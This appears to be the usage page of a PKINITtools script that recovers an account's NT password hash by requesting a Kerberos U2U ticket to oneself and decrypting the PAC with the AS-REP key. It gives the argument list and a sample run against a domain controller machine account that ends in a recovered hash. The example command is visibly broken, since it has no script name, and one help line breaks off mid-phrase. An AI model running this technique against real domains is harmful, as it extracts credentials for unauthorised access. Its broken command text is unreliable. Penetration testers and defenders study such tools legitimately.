- Use Kerberos U2U to submit a TGS request for yourself

Use Kerberos U2U to submit a TGS request for yourself. This will include with the PAC which in turn contains the NT hash that you can decrypt with the AS-REP key that was used for your specific TGT. It’s magic really. This tool requires a TGT resulting from PKINIT to be in your KRB5CCNAME env variable.


Install PKINITtools.

Usage [-h] -key KEY [-dc-ip ip address] [-debug] identity


positional arguments:
  identity           domain/username

  -h, --help         show this help message and exit
  -key KEY           AS REP key from
  -dc-ip ip address  IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
  -debug             Turn DEBUG output ON


(PKINITtools) user@localhost:~/PKINITtools$ export KRB5CCNAME=s2019dc.ccache
(PKINITtools) user@localhost:~/PKINITtools$ python testsegment.local/s2019dc\$ -key 5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash